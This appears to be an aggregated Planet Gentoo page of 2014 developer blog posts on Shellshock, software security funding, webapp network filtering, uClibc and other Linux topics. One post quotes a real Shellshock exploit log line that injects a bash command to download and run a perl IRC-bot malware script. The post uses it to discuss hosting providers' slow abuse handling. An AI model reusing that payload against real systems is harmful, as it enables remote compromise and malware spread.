Software installed on almost any Linux system

Let me propose a little experiment: Take your favorite Linux distribution, make a minimal installation without anything and look what's installed. These are the software projects you should worry about. To make things easier I did this for you. I took my own system of choice, Gentoo Linux, but the results wouldn't be very different on other distributions. The results are at at the bottom of this text. (I removed everything Gentoo-specific.) I admit this is oversimplifying things. Some of these provide more attack surface than others, we should probably worry more about the ones that are directly involved in providing network services.

After Heartbleed some people already asked questions like these. How could it happen that a project so essential to IT security is so underfunded? Some large companies acted and the result is the Core Infrastructure Initiative by the Linux Foundation, which already helped improving OpenSSL development. This is a great start and an example for an initiative of which we should have more. We should ask the large IT companies who are not part of that initiative what they are doing to improve overall Internet security.

Just to put this into perspective: A thorough security audit of a project like Bash would probably require a five figure number of dollars. For a small, volunteer driven project this is huge. For a company like Apple - the one that installed Bash on all their laptops - it's nearly nothing.

There's another recent development I find noteworthy. Google started Project Zero where they hired some of the brightest minds in IT security and gave them a single job: Search for security bugs. Not in Google's own software. In every piece of software out there. This is not merely an altruistic project. It makes sense for Google. They want the web to be a safer place - because the web is where they earn their money. I like that approach a lot and I have only one question to ask about it: Why doesn't every large IT company have a Project Zero?

Sparking interest

There's another aspect I want to talk about. After Heartbleed people started having a closer look at OpenSSL and found a number of small and one other quite severe issue. After Bash people instantly found more issues in the function parser and we now have six CVEs for Shellshock and friends. When a piece of software is affected by a severe security bug people start to look for more. I wonder what it'd take to have people looking at the projects that aren't in the spotlight.

I was brainstorming if we could have something like a "free software audit action day". A regular call where an important but neglected project is chosen and the security community is asked to have a look at it. This is just a vague idea for now, if you like it please leave a comment.

That's it. I refrain from having discussions whether bugs like Heartbleed or Shellshock disprove the "many eyes"-principle that free software advocates like to cite, because I think these discussions are a pointless waste of time. I'd like to discuss how to improve things. Let's start.

Here's the promised list of Gentoo packages in the standard installation:


October 04, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)

It has been four months since my last major build and release of Lilblue Linux, a pet project of mine [1].  The name is a bit pretentious, I admit, since Lilblue is not some other Linux distro.  It is Gentoo, but Gentoo with a twist.  It’s a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library.  I use it on some of my workstations at the College and at home, like any other desktop, and I know other people that use it too, but the main reason for its existence is that I wanted to push uClibc to its limits and see where things break.  Back in 2011, I got bored of working with the usual set of embedded packages.  So, while my students where writing their exams in Modern OS, I entertained myself just adding more and more packages to a stage3-amd64-hardened system [2] until I had a decent desktop.  After playing with it on and off, I finally polished it where I thought others might enjoy it too and started pushing out releases.  Recently, I found out that the folks behind uselessd [3] used Lilblue as their testing ground. uselessd is another response to systemd [4], something like eudev [5], which I maintain, so the irony here is too much not to mention!  But that’s another story …

There was only one interesting issue about this release.  Generally I try to keep all releases about the same.  I’m not constantly updating the list of packages in @world.  I did remove pulseaudio this time around because it never did work right and I don’t use it.  I’ll fix it in the future, but not yet!  Instead, I concentrated on a much more interesting problem with a new release of e2fsprogs [6].   The problem started when upstream’s commit 58229aaf removed a broken fallback syscall for fallocate64() on systems where the latter is unavailable [7].  There was nothing wrong with this commit, in fact, it was the correct thing to do.  e4defrag.c used to have the following code:

#warning Using locally defined fallocate syscall interface.

#ifndef __NR_fallocate
#error Your kernel headers dont define __NR_fallocate

 * fallocate64() - Manipulate file space.
 * @fd: defrag target file's descriptor.
 * @mode: process flag.
 * @offset: file offset.
 * @len: file size.
static int fallocate64(int fd, int mode, loff_t offset, loff_t len)
    return syscall(__NR_fallocate, fd, mode, offset, len);
#endif /* ! HAVE_FALLOCATE */

The idea was that, if a configure test for fallocate64() failed because it isn’t available in your libc, but there is a system call for it in the kernel, then e4defrag would just make the syscall via your libc’s indirect syscall() function.  Seems simple enough, except that how system calls are dispatched is architecture and ABI dependant and the above is broken on 32-bit systems [8].  Of course, uClibc didn’t have fallocate() so e4defrag failed to build after that commit.  To my surprise, musl does have fallocate() so this wasn’t a problem there, even though it is a Linux specific function and not in any standard.

My first approach was to patch e2fsprogs to use posix_fallocate() which is supposed to be equivalent to fallocate() when invoked with mode = 0.  e4defrag calls fallocate() in mode = 0, so this seemed like a simple fix.  However, this was not acceptable to Ts’o since he was worried that some libc might implement posix_fallocate() by brute force writing 0′s.  That could be horribly slow for large allocations!  This wasn’t the case for uClibc’s implementation but that didn’t seem to make much difference upstream.  Meh.

Rather than fight e2fsprogs, I sat down and hacked fallocate() into uClibc.  Since both fallocate() and posix_fallocate(), and their LFS counterparts fallocate64() and posix_fallocate64(), make the same syscall, it was sufficient to isolate that in an internal function which both could make use of.  That, plus a test suite, and Bernhard was kind enough to commit it to master [10].  Then a couple of backports, and uClibc’s 0.9.33 branch now has the fix as well.  Because there hasn’t been a release of  uClibc in about two years, I’m using the 0.9.33 branch HEAD for Lilblue, so the problem there was solved — I know its a little problematic, but it was either that or try to juggle dozens of patches.

The only thing that remains is to backport those fixes to vapier’s patchset that he maintains for the uClibc ebuilds.  Since my uClibc stage3′s don’t use the 0.9.33 branch head, but the stable tree ebuilds which use the vanilla release plus Mike’s patchset, upgrading e2fsprogs is blocked for those stages.

This whole process may seem like a real pita, but this is exactly the sort of issues I like uncovering and cleaning up.  So far, the feedback on the latest release is good.  If you want to play with Lilblue and you don’t have a free box, fire up VirtualBox or your emulator of choice and give it a try.  You can download it from the experimental/amd64/uclibc off any mirror [11].

October 03, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Does your webapp really need network access? (October 03, 2014, 23:01 UTC)

One of the interesting thing that I noticed after shellshock was the amount of probes for vulnerabilities that counted on webapp users to have direct network access. Not only ping to known addresses to just verify the vulnerability, or wget or curl with unique IDs, but even very rough nc or even /dev/tcp connections to give remote shells. The fact that probes are there makes it logical to me to expect that for at least some of the systems these actually worked.

The reason why this piqued my interest is because I realized that most people don't do the one obvious step to mitigate this kind of problems by removing (or at least limiting) the access to the network of their web apps. So I decided it might be a worth idea to describe a moment why you should think of that. This is in part because I found out last year at LISA that not all sysadmins have enough training in development to immediately pick up how things work, and in part because I know that even if you're a programmer it might be counterintuitive for you to think that web apps should not have access, well, to the web.

Indeed, if you think of your app in the abstract, it has to have access to the network to serve the response to the users, right? But what happens generally is that you have some division between the web server and the app itself. People who have looked into Java in the early nougthies probably have heard of the term Application Server, which usually is present in form of Apache Tomcat or IBM WebSphere, but here is essentially the same "actor" for Rails app in the form of Passenger, or for PHP with the php-fpm service. These "servers" are effectively self-contained environments for your app, that talk with the web server to receive user requests and serve them responses. This essentially mean that in the basic web interaction, there is no network access needed for the application service.

Things gets a bit more complicated in the Web 2.0 era though: OAuth2 requires your web app to talk, from the backend, with the authentication or data providers. Similarly even my blog needs to talk with some services, to either ping them to tell them that a new post is out, and to check with Akismet for blog comments that might or might not be spam. WordPress plugins that create thumbnails are known to exist and to have a bad history of security and they fetch external content, such as videos from YouTube and Vimeo, or images from Flickr and other hosting websites to process. So there is a good amount of network connectivity needed for web apps too. Which means that rather than just isolating apps from the network, what you need to implement is some sort of filter.

Now, there are plenty of ways to remove access to the network from your webapp: SElinux, GrSec RBAC, AppArmor, … but if you don't want to set up a complex security system, you can do the trick even with the bare minimum of the Linux kernel, iptables and CONFIG_NETFILTER_XT_MATCH_OWNER. Essentially what this allows you to do is to match (and thus filter) connections based of the originating (or destination) user. This of course only works if you can isolate your webapps on a separate user, which is definitely what you should do, but not necessarily what people are doing. Especially with things like mod_perl or mod_php, separating webapps in users is difficult – they run in-process with the webserver, and negate the split with the application server – but at least php-fpm and Passenger allow for that quite easily. Running as separate users, by the way, has many more advantages than just network filtering, so start doing that now, no matter what.

Now depending on what webapp you have in front of you, you have different ways to achieve a near-perfect setup. In my case I have a few different applications running across my servers. My blog, a WordPress blog of a customer, phpMyAdmin for that database, and finally a webapp for an old customer which is essentially an ERP. These have different requirements so I'll start from the one that has the lowest.

The ERP app was designed to be as simple as possible: it's a basic Rails app that uses PostgreSQL to store data. The authentication is done by Apache via HTTP Basic Auth over HTTPS (no plaintext), so there is no OAuth2 or other backend interaction. The only expected connection is to the PostgreSQL server. Pretty similar the requirements for phpMyAdmin: it only has to interface with Apache and with the MySQL service it administers, and the authentication is also done on the HTTP side (also encrypted). For both these apps, your network policy is quite obvious: negate any outside connectivity. This becomes a matter of iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT — and the same for the other user.

The situation for the other two apps is a bit more complex: my blog wants to at least announce that there are new blog posts, and it needs to reach Akismet; both actions use HTTP and HTTPS. WordPress is a bit more complex because I don't have much control over it (it has a dedicated server, so I don't have to care), but I assume it mostly is also HTTP and HTTPS. The obvious idea would be to allow ports 80, 443 and 53 (for resolution). But you can do something better. You can put a proxy on your localhost, and force the webapp to go through it, either as a transparent proxy or by using the environment variable http_proxy to convince the webapp to never connect directly to the web. Unfortunately that is not straight forward to implement as neither Passenger not php-fpm has a clean way to pass environment variables per users.

What I've done is for now is to hack the environment.rb file to set ENV['http_proxy'] = '' so that Ruby will at least respect it. I'm still out for a solution for PHP unfortunately. In the case of Typo, this actually showed me two things I did not know: when looking at the admin dashboard, it'll make two main HTTP calls: one to Google Blog Search – which was shut down back in May – and one to Typo's version file — which is now a 404 page since the move to the Publify name. I'll be soon shutting down both implementations since I really don't need it. Indeed the Publify development still seems to go toward the "let's add all possible new features that other blogging sites have" without considering the actual scalability of the platform. I don't expect me to go back to it any time soon.

Anthony Basile a.k.a. blueness (homepage, bugs)

Two years ago, I took on the maintenance of thttpd, a web server written by Jef Poskanzer at ACME Labs [1].  The code hadn’t been update in about 10 years and there were dozens of accumulated patches on the Gentoo tree, many of which addressed serious security issues.  I emailed upstream and was told the project was “done” whatever that meant, so I was going to tree clean it.  I expressed my intentions on the upstream mailing list when I got a bunch of “please don’t!” from users.  So rather than maintain a ton of patches, I forked the code, rewrote the build system to use autotools, and applied all the patch.  I dubbed the fork sthttpd.  There was no particular meaning to the “s”.  Maybe “still kicking”?

I put a git repo up on my server [2], got a mail list going [3], and set up bugzilla [4].  There hasn’t been much activity but there was enough because it got noticed by someone who pushed it out in OpenBSD ports [5].

Today, I finally pushed out 2.27.0 after two years.  This release takes care of a couple of new security issues: I fixed the world readable log problem, CVE-2013-0348 [6], and Vitezslav Cizek <>  from OpenSUSE fixed a possible DOS triggered by specially crafted .htpasswd. Bob Tennent added some code to correct headers for .svgz content, and Jean-Philippe Ouellet did some code cleanup.  So it was time.

Web servers are not my style, but its tiny size and speed makes it perfect for embedded systems which are near and dear to my heart.  I also make sure it compiles on *BSD and Linux with glibc, uClibc or musl.  Not bad for a codebase which is over 10 years old!  Kudos to Jef.

Hanno Böck a.k.a. hanno (homepage, bugs)
New laptop Lenovo Thinkpad X1 Carbon 20A7 (October 03, 2014, 21:05 UTC)

Thinkpad X1 CarbonWhile I got along well with my Thinkpad T61 laptop, for quite some time I had the plan to get a new one soon. It wasn't an easy decision and I looked in detail at the models available in recent months. I finally decided to buy one of Lenovo's Thinkpad X1 Carbon laptops in its 2014 edition. The X1 Carbon was introduced in 2012, however a completely new variant which is very different from the first one was released early 2014. To distinguish it from other models it is the 20A7 model.

Judging from the first days of use I think I made the right decision. I hadn't seen the device before I bought it because it seems rarely shops keep this device in stock. I assume this is due to the relatively high price.

I was a bit worried because Lenovo made some unusual decisions for the keyboard, however having used it for a few days I don't feel that it has any severe downsides. The most unusual thing about it is that it doesn't have normal F1-F12 keys, instead it has what Lenovo calls an adaptive keyboard: A touch sensitive line which can display different kinds of keys. The idea is that different applications can have their own set of special keys there. However, just letting them display the normal F-keys works well and not having "real" keys there doesn't feel like a big disadvantage. Beside that Lenovo removed the Caps lock and placed Pos1/End there, which is a bit unusual but also nothing I worried about. I also hadn't seen any pictures of the German keyboard before I bought the device. The ^/°-key is not where it's used to be (small downside), but the </>/| key is where it belongs(big plus, many laptop vendors get that wrong).

Good things:
* Lightweight, Ultrabook, no unnecessary stuff like CD/DVD drive
* High resolution (2560x1440)
* Hardware is up-to-date (Haswell chipset)

* Due to ultrabook / integrated design easy changing battery, ram or HD
* No SD card reader
* Have some trouble getting used to the touchpad (however there are lots of possibilities to configure it, I assume by playing with it that'll get better)

It used to be the case that people wrote docs how to get all the hardware in a laptop running on Linux which I did my previous laptops. These days this usually boils down to "run a recent Linux distribution with the latest kernels and xorg packages and most things will be fine". However I thought having a central place where I collect relevant information would be nice so I created one again. As usual I'm running Gentoo Linux.

For people who plan to run Linux without a dual boot it may be worth mentioning that there seem to be troublesome errors in earlier versions of the BIOS and the SSD firmware. You may want to update them before removing Windows. On my device they were already up-to-date.

September 30, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
A little positivity goes a long way (September 30, 2014, 02:59 UTC)

Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day—with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that’s really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said “good morning.” She responded with “what a beautiful smile! You make sure to give that gift to everyone today.” I was really taken back by her comment because it was rather uncommon in this day and age.

Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn’t anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn’t know each other at all, but yet we were able to carry on a short conversation, understand one another’s humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without as much as a “thank you.” All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking them how they’re doing, holding a door, helping someone pick up something that they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity, and you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”


September 28, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Responsibility in running Internet infrastructure (September 28, 2014, 23:31 UTC)

If you have any interest in IT security you probably heared of a vulnerability in the command line shell Bash now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software it's inevitable that this will have some impact. Machines get owned and abused to send Spam, DDoS other people or spread Malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run infrastructure in the Internet in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - beside some scans that were done by researchers. On Saturday I had a look at a few of such log entries, from my own servers and what other people posted on some forums. This was one of them: - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget;curl -O /var/tmp/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: This was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is running a HTTP request where the user agent string which usually contains the name of the software (e. g. the browser) is set to some malicious code meant to exploit the Bash vulnerability. If successful it would download a malware script called jurat and execute it. We obviously had already upgraded our Bash installation so this didn't do anything on our servers. The file jurat contains a perl script which is a malware called IRCbot.a or Shellbot.B.

For all such logs I checked if the downloads were still available. Most of them were offline, however the one presented here was still there. I checked the IP, it belongs to a dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.

I tried to contact AltusHost in different ways. I tweetet them. I tried their live support chat. I could chat with somebody who asked me if I'm a customer. He told me that if I want to report an abuse he can't help me, I should write an email to their abuse department. I asked him if he couldn't just tell them. He said that's not possible. I wrote an email to their abuse department. Nothing happened.

On sunday noon the malware was still online. When I checked again on late Sunday evening it was gone.

Don't get me wrong: Things like this happen. I run servers myself. You cannot protect your infrastructure from any imaginable threat. You can greatly reduce the risk and we try a lot to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is having a reasonable crisis management.

When one of the servers in your responsibility is part of a large scale attack based on a threat that's headline in all news I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The timescale you take action in such a situation is the difference between hundreds or millions of infected hosts. Having your hosts deploy malware that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but by their inaction.

Sebastian Pipping a.k.a. sping (homepage, bugs)
Unblocking F-keys (e.g. F9 for htop) in Guake 0.5.0 (September 28, 2014, 18:36 UTC)

I noticed that I couldn’t kill a process in htop today, F9 did not seem to be working, actualy most of the F-keys did not.

The reason turnout out to be that Guake 0.5.0 takes over keys F1 to F10 for direct access to tabs 1 to 10.
That may work for most terminal applications, but for htop it’s a killer.

So how can I prevent Guake from taking F9 over?
The preferences dialog allows me to assign a different key, but not no key. Really? There is no context menu, backspace and delete didn’t help. For now I assume it’s not possible.
So I fire up the gconf-editor, menu > Edit > Find… > “guake” — there it is. However, upon “Edit key…” gconf-editor says to me:

Currently pairs and schemas can’t be edited. This will be changed in a later version.

Very nice.

In the end what did work was to run

gconftool-2 --set /schemas/apps/guake/keybindings/local/switch_tab9 \
	--type string ''

and to restart Guake.

I just opened a bug for this. If you like, you can follow it at .

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
What does #shellshock mean for Gentoo? (September 28, 2014, 10:56 UTC)

Gentoo Penguins with chicks at Jougla Point, Antarctica
Photo credit: Liam Quinn

This is going to be interesting as Planet Gentoo is currently unavailable as I write this. I'll try to send this out further so that people know about it.

By now we have all been doing our best to update our laptops and servers to the new bash version so that we are safe from the big scare of the quarter, shellshock. I say laptop because the way the vulnerability can be exploited limits the impact considerably if you have a desktop or otherwise connect only to trusted networks.

What remains to be done is to figure out how to avoid this repeats. And that's a difficult topic, because a 25 years old bug is not easy to avoid, especially because there are probably plenty of siblings of it around, that we have not found yet, just like this last week. But there are things that we can do as a whole environment to reduce the chances of problems like this to either happen or at least avoid that they escalate so quickly.

In this post I want to look into some things that Gentoo and its developers can do to make things better.

The first obvious thing is to figure out why /bin/sh for Gentoo is not dash or any other very limited shell such as BusyBox. The main answer lies in the init scripts that still use bashisms; this is not news, as I've pushed for that four years ago, while Roy insisted on it even before that. Interestingly enough, though, this excuse is getting less and less relevant thanks to systemd. It is indeed, among all the reasons, one I find very much good in Lennart's design: we want declarative init systems, not imperative ones. Unfortunately, even systemd is not as declarative as it was originally supposed to be, so the init script problem is half unsolved — on the other hand, it does make things much easier, as you have to start afresh anyway.

If either all your init scripts are non-bash-requiring or you're using systemd (like me on the laptops), then it's mostly safe to switch to use dash as the provider for /bin/sh:

# emerge eselect-sh
# eselect sh set dash

That will change your /bin/sh and make it much less likely that you'd be vulnerable to this particular problem. Unfortunately as I said it's mostly safe. I even found that some of the init scripts I wrote, that I checked with checkbashisms did not work as intended with dash, fixes are on their way. I also found that the lsb_release command, while not requiring bash itself, uses non-POSIX features, resulting in garbage on the output — this breaks facter-2 but not facter-1, I found out when it broke my Puppet setup.

Interestingly it would be simpler for me to use zsh, as then both the init script and lsb_release would have worked. Unfortunately when I tried doing that, Emacs tramp-mode froze when trying to open files, both with sshx and sudo modes. The same was true for using BusyBox, so I decided to just install dash everywhere and use that.

Unfortunately it does not mean you'll be perfectly safe or that you can remove bash from your system. Especially in Gentoo, we have too many dependencies on it, the first being Portage of course, but eselect also qualifies. Of the two I'm actually more concerned about eselect: I have been saying this from the start, but designing such a major piece of software – that does not change that often – in bash sounds like insanity. I still think that is the case.

I think this is the main problem: in Gentoo especially, bash has always been considered a programming language. That's bad. Not only because it only has one reference implementation, but it also seem to convince other people, new to coding, that it's a good engineering practice. It is not. If you need to build something like eselect, you do it in Python, or Perl, or C, but not bash!

Gentoo is currently stagnating, and that's hard to deny. I've stopped being active since I finally accepted stable employment – I'm almost thirty, it was time to stop playing around, I needed to make a living, even if I don't really make a life – and QA has obviously taken a step back (I still have a non-working dev-python/imaging on my laptop). So trying to push for getting rid of bash in Gentoo altogether is not a good deal. On the other hand, even though it's going to be probably too late to be relevant, I'll push for having a Summer of Code next year to convert eselect to Python or something along those lines.

Myself, I decided that the current bashisms in the init scripts I rely upon on my servers are simple enough that dash will work, so I pushed that through puppet to all my servers. It should be enough, for the moment. I expect more scrutiny to be spent on dash, zsh, ksh and the other shells in the next few months as people migrate around, or decide that a 25 years old bug is enough to think twice about all of them, o I'll keep my options open.

This is actually why I like software biodiversity: it allows to have options to select different options when one components fail, and that is what worries me the most with systemd right now. I also hope that showing how bad bash has been all this time with its closed development will make it possible to have a better syntax-compatible shell with a proper parser, even better with a proper librarised implementation. But that's probably hoping too much.

September 27, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)
Tor-ramdisk 20140925 released (September 27, 2014, 16:35 UTC)

I’ve been blogging about my non-Gentoo work using my drupal site at  but since I may be loosing that server sometime in the future, I’m going to start duplicating those posts here.  This work should be of interest to readers of Planet Gentoo because it draws a lot from Gentoo, but it doesn’t exactly fall under the category of a “Gentoo Project.”

Anyhow, today I’m releasing tor-ramdisk 20140925.  As you may recall from a previous post, tor-ramdisk is a uClibc-based micro Linux distribution I maintain whose only purpose is to host a Tor server in an environment that maximizes security and privacy.  Security is enhanced using Gentoo’s hardened toolchain and kernel, while privacy is enhanced by forcing logging to be off at all levels.  Also, tor-ramdisk runs in RAM, so no information survives a reboot, except for the configuration file and the private RSA key, which may be exported/imported by FTP or SCP.

A few days ago, the Tor team released with one major bug fix according to their ChangeLog. Clients were apparently sending the wrong address for their chosen rendezvous points for hidden services, which sounds like it shouldn’t work, but it did because they also sent the identity digest. This fix should improve surfing of hidden services. The other minor changes involved updating geoip information and the address of a v3 directory authority, gabelmoo.

I took this opportunity to also update busybox to version 1.22.1, openssl to 1.0.1i, and the kernel to 3.16.3 + Gentoo’s hardened-patches-3.16.3-1.extras. Both the x86 and x86_64 images were tested using node “simba” and showed no issues.

You can get tor-ramdisk from the following urls (at least for now!)




September 26, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

Living on Credit Cards
Photo credit: Images_of_Money

Almost exactly 18 months after moving to Ireland I'm finally bound to receive my first Irish credit card. This took longer than I was expecting but at least it should cover a few of the needs I have, although it's not exactly my perfect plan either. But I guess it's better start from the top.

First of all, I have already credit cards, Italian ones that as I wrote before, they are not chip'n'pin which causes a major headache in countries such as Ireland (but UK too), where non-chip'n'pin capable cards are not really well supported or understood. This means that they are not viable, even though I have been using them for years and I have enough credit history with them that they have a higher limit than the norm, which is especially handy when dealing with things like expensive hotels if I'm on vacation.

But the question becomes why do I need a credit card? The answer lies in the mess that the Irish banking system is: since there is no "good" bank over here, I've been using the same bank I was signed up with when I arrived, AIB. Unfortunately their default account, which is advertised as "free", is only really free if for the whole quarter your bank account never goes below €2.5k. This is not the "usual" style I've seen from American banks where they expect that your average does not go below a certain amount, it does not matter if one day you have no money and the next you have €10k on it: if for one day in the quarter you dip below the threshold, you have to pay for the account, and dearly. At that point every single operation becomes a €.20 charge. Including PayPal's debit/credit verification, AdSense EFT account verification, Amazon KDP monthly credits. And including every single use of your debit card — for a while, NFC payments were excluded, so I tried to use it more, but very few merchants allowed that, and the €15 limit on its use made it quite impractical to pay most things. In the past year and a half, I paid an average of €50/quarter for a so-called free account.

Operations on most credit cards are on the other hand free; there are sometimes charges for "oversea usage" (foreign transactions), and you are charged interests if you don't pay the full amount of the debt at the end of the month, but you don't pay a fixed charge per operation. What you do pay here in Ireland is stamp duty, which is €30/year. A whole lot more than Italy where it was €1.81 until they dropped it on the floor. So my requirements on a credit card are to essentially hide as much as possible these costs. Which essentially mean that just getting a standard AIB card is not going to be very useful: yes I would be saving money after the first 150 operations, but I would be saving more to save enough to keep those €2.5k in the bank.

My planned end games were two: a Tesco credit card and an American Express Platinum, for very different reasons. I was finally able to get the former, but the latter is definitely out of my reach, as I'll explain later.

The Tesco credit card is a very simple option: you get 0.5% "pointback", as you get 1 Clubcard point every €2 spent. Since for each point you get a €.01 discount at end of quarter, it's almost like a cashback, as long as you buy your groceries from Tesco (that I do, because it's handy to have the delivery rather than having to go out for that, especially for things that are frozen or that weight a bit). Given that it starts with (I'm told) a puny limit of €750, maxing it out every month is enough to get back the stamp duty price with just the cashback, but it becomes even easier by using it for all the small operations such as dinner, Tesco orders, online charges, mobile phone, …

Getting the Tesco credit card has not been straightforward either. I tried applying a few months after arriving in Ireland, and I was rejected, as I did not have any credit history at all. I tried again earlier this year, adding a raise at work, and the results have been positive. Unfortunately that's only step one: the following steps require you to provide them with three pieces of documentation: something that ensures you're in control of the bank account, a proof of address, and a proof of identity.

The first is kinda obvious: a recent enough bank statement is good, and so is the second, a phone or utility bill — the problem starts when you notice that they ask you for an original and not a copy "from the Internet". This does not work easily given that I explicitly made sure all my services are paperless, so neither the bank nor the phone company sends me paper any more — the bank was the hardest to convince, for over an year they kept sending me a paper letter for every single wire I received with the exception of my pay, which included money coming from colleagues when I acted as a payment hub, PayPal transfer for verification purposes and Amazon KDP revenue, one per country! Luckily, they accepted a color printed copy of both.

Getting a proper ID certified was, though, much more complex. The only document I could use was my passport, as I don't have a driving license or any other Irish ID. I made a proper copy of it, in color, and brought it to my doctor for certification, he stamped and dated and declared, but it was not okay. I brought it to An Post – the Irish postal service – and told them that Tesco wanted a specific declaration on it, and to see the letter they sent me; they refused and just stamped it. I then went to the Garda – the Irish police – and I repeated Tesco's request; not only they refused to comply, but they told me that they are not allowed to do what Tesco was asking me to make them do, and instead they authenticated a declaration of mine that the passport copy was original and made by me.

What worked, at the end, was to go to a bank branch – didn't have to be the branch I'm enrolled with – and have them stamp the passport for me. Tesco didn't care it was a different branch and they didn't know me, it was still my bank and they accepted it. Of course since it took a few months for me to go through all these tries, by the time they accepted my passport, I needed to send them another proof of address, but that was easy. After that I finally got the full contract to sign and I'm now only awaiting the actual plastic card.

But as I said my aim was also for an American Express Platinum card. This is a more interesting case study: the card is far from free, as it starts with a yearly fee of €550, which is what makes it a bit of a status symbol. On the other hand, it comes with two features: their rewards program, and the perks of Platinum. The perks are not all useful to me, having Hertz Gold is not useful if you don't drive, and I already have comprehensive travel insurance. I also have (almost) platinum status with IHG so I don't need a card to get the usual free upgrades if available. The good part about them, though, is that you can bless a second Platinum card that gets the same advantages, to "friends or family" — in my case, the target would have been my brother in law, as he and my sister love to travel and do rent cars.

It also gives you the option of sending four more cards also to friends and family, and in particular I wanted to have one sent to my mother, so that she can have a way to pay for things and debit them to me so I can help her out. Of course as I said it has a cost, and a hefty one. Ont he other hand, it allows you one more trick: you can pay for the membership fee through the same rewards program they sign you up for. I don't remember how much you have to spend in an year to pay for it, but I'm sure I could have managed to get most of the fee waived.

Unfortunately what happens is that American Express requires, in Ireland, a "bank guarantee" — which according to colleagues means your bank should be taking on the onus of paying for the first €15k debt I would incur and wouldn't be able to repay. Something like this is not going to fly in Ireland, not only because of the problem with loans after the crisis but also because none of the banks will give you that guarantee today. Essentially American Express is making it impossible for any Irish resident to get a card from them, and this, again according to colleagues, extends to cardholders in other countries moving into Ireland.

The end result is that I'm now stuck with having only one (Visa) credit card in Ireland, which had feeble, laughable rewards program, but at least I have it, and it should be able to repay itself. I'm up to find a MasterCard card I can have to hedge my bets on the acceptance of the card – turns out that Visa is not well received in the Netherlands and in Germany – and that can repay itself for the stamp duty.

Tech media has been all the rage this year with trying to hype everything out there as the end of the Internet of Things or the nail on the coffin of open source. A bunch of opinion pieces I found also tried to imply that open source software is to blame, forgetting that the only reason why the security issues found had been considered so nasty is because we know they are widely used.

First there was Heartbleed with its discoverers deciding to spend time setting up a cool name and logo and website for, rather than ensuring it would be patched before it became widely known. Months later, LastPass still tells me that some of the websites I have passwords on have not changed their certificate. This spawned some interest around OpenSSL at least, including the OpenBSD fork which I'm still not sure is going to stick around or not.

Just few weeks ago a dump of passwords caused major stir as some online news sources kept insisting that Google had been hacked. Similarly, people have been insisting for the longest time that it was only Apple's fault if the photos of a bunch of celebrities were stolen and published on a bunch of sites — and will probably never be expunged from the Internet's collective conscience.

And then there is the whole hysteria about shellshock which I already dug into. What I promised on that post is looking at the problem from the angle of the project health.

With the term project health I'm referring to a whole set of issues around an open source software project. It's something that becomes second nature for a distribution packager/developer, but is not obvious to many, especially because it is not easy to quantify. It's not a function of the number of commits or committers, the number of mailing lists or the traffic in them. It's an aura.

That OpenSSL's project health was terrible was no mystery to anybody. The code base in particular was terribly complicated and cater for corner cases that stopped being relevant years ago, and the LibreSSL developers have found plenty of reasons to be worried. But the fact that the codebase was in such a state, and that the developers don't care to follow what the distributors do, or review patches properly, was not a surprise. You just need to be reminded of the Debian SSL debacle which dates back to 2008.

In the case of bash, the situation is a bit more complex. The shell is a base component of all GNU systems, and is FSF's choice of UNIX shell. The fact that the man page states clearly It's too big and too slow. should tip people off but it doesn't. And it's not just a matter of extending the POSIX shell syntax with enough sugar that people take it for a programming language and start using them — but that's also a big problem that caused this particular issue.

The health of bash was not considered good by anybody involved with it on a distribution level. It certainly was not considered good for me, as I moved to zsh years and years ago, and I have been working for over five years years on getting rid of bashisms in scripts. Indeed, I have been pushing, with Roy and others, for the init scripts in Gentoo to be made completely POSIX shell compatible so that they can run with dash or with busybox — even before I was paid to do so for one of the devices I worked on.

